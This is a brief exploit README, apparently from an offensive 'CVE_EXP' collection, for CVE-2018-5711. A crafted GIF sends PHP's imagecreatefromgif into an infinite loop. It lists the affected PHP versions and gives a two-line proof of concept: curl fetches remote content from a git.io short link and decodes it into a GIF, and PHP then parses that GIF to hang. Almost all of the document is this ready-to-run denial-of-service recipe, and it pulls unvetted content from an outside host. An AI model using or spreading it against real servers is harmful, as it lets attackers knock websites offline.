0day/00-CVE_EXP/CVE-2018-5711-hanging-websites-by-a-harmful-gif

CVE-2018-5711 - Hanging Websites by a Harmful GIF

Author : Orange Tsai

Affected

• PHP 5<5.6.33
• PHP 7.0<7.0.27
• PHP 7.1<7.1.13
• PHP 7.2<7.2.1

POC

$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'

  Infinite loop here...

Reference

• http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html